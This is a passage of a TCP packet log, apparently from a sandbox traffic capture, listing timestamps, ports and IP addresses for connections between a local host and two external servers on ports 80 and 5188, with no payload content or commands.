Dec 5, 2024 17:32:16.467886925 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.467936039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.468178988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.468262911 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.468805075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.469023943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.469037056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.469073057 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.469789028 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.469836950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.470319986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.470357895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.470696926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.470746994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.470904112 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.470967054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.471640110 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.471688986 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.471771002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.472532034 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.472587109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.473109007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.473159075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.473531008 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.473573923 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.473772049 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.473814011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.474463940 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.474505901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.474572897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.474611044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.475337982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.475388050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.475457907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.475493908 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.476317883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.476375103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.476447105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.476490021 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.477247953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.477281094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.477310896 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.477332115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.478252888 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.478303909 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.478354931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.478389978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.479026079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.479079008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.479624033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.479677916 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.480017900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.480066061 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.480895996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.480941057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.480954885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.480957031 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.480977058 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.480998039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.481879950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.482080936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.482134104 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.482780933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.482829094 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.482902050 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.482944965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.483783960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.483859062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.485011101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.485095978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.485148907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.485191107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.485215902 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.485250950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.485913992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.486043930 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.486162901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.486268997 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.486541033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.486591101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.486654043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.487129927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.487437963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.487493038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.487838030 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.487888098 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.488390923 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.488478899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.488517046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.488543987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.489324093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.489366055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.489459991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.489562035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.490194082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.490252018 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.490313053 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.490348101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.491158962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.491369009 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.491437912 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.492202997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.492269039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.492295027 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.492332935 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.493043900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.493104935 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.493168116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.493206024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.494061947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.494090080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.494143009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.494891882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.494945049 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.495004892 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.495047092 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.495817900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.495878935 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.495939016 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.496021032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.496736050 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.496786118 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.496961117 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.497006893 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.497683048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.497745991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.497817039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.497864008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.498720884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.498761892 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.498780966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.498794079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.499530077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.499566078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.499597073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.499629974 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.500507116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.500555992 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.500574112 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.500607967 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.501400948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.501451015 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.501477003 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.501507998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.502372026 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.502497911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.502541065 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.503254890 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.503297091 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.503328085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.503361940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.504278898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.504312038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.504326105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.504345894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.505016088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.505055904 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.505119085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.505527020 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.505841970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.505865097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.505887032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.505913973 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.506700993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.506750107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.506892920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.506943941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.507652044 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.507702112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.546066046 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.546096087 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.546108961 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.546180010 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.546343088 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.546437979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.546451092 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.546471119 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.546497107 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.547218084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.547269106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.547282934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.547324896 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.548155069 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.548207998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.548212051 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.548222065 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.548259020 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.549201012 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.549246073 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.549259901 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.549325943 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.549920082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.549963951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.549992085 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.550004959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.550049067 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.550865889 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.550930023 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.550944090 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.550991058 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.551851988 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.551906109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.551918983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.551965952 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.552787066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.552820921 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.552834034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.552849054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.552892923 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.553774118 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.553828001 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.553839922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.553879023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.554358959 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.554713964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.554774046 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.554785967 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.554835081 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.555859089 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.555876970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.555891037 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.555921078 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.555934906 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.556704044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.556720018 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.556734085 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.556771040 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.559400082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.559416056 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.559437037 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.559448957 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.559452057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.559468031 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.559468985 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.559483051 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.559514999 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.559637070 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.559658051 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.559693098 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.559714079 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.559758902 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.560446978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.560504913 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.560518026 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.560565948 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.561427116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.561476946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.561480999 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.561510086 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.561539888 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.562397957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.562436104 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.562448025 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.562483072 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.563363075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.563399076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.563410997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.563467026 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.564441919 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.564496994 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.564508915 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.564553022 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.565423012 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.565459013 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.565471888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.565510988 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.566272020 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.566332102 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.566346884 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.566389084 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.567354918 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.567399979 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.567672968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.567754030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.567765951 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.567799091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.568882942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.568916082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.568928957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.568974972 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.568993092 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.569869995 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.569921970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.569935083 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.569979906 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.570684910 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.570734024 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.570748091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.570785046 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.570801020 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.571598053 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.571625948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.571640968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.571676970 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.572495937 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.572552919 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.572563887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.572601080 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.572624922 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.573559046 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.573594093 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.573606968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.573638916 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.574403048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.574464083 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.574476957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.574526072 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.574547052 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.575576067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.575637102 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.575656891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.575692892 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.576550961 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.576580048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.576592922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.576628923 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.576646090 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.577342033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.577415943 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.577430010 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.577465057 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.579066992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.579104900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.579117060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.579163074 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.579195023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.579832077 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.580167055 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.580221891 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.651673079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.651801109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.651875019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.652156115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.652204037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.652213097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.652249098 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.653063059 CET	80	49793	185.215.113.84	192.168.2.11
